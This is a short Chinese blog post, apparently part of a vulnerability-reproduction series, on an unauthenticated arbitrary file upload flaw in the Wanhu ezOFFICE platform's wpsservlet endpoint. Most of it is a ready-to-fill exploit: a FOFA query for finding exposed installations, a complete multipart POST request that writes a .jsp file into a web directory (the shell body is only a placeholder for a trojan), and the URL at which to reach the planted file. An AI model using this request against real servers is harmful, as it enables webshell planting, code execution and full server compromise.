Babing
Published on 2024-08-30 / 4 Visits
0
0

W1-20万户-ezOffice-文件上传

W1-20万户-ezOffice-文件上传

漏洞描述:

万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。

网站图片:

image.png

网络测绘:

fofa语法:

FOFA:app=“万户网络-ezOFFICE”

漏洞复现:

payload:

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=1&dir=/platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip

--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; name="NewFile"; filename="1.jsp"

马子
--803e058d60f347f7b3c17fa95228eca6--

效果图:
上传马子

验证url

http://your-ip/defaultroot/platform/portal/layout/1.jsp


Comment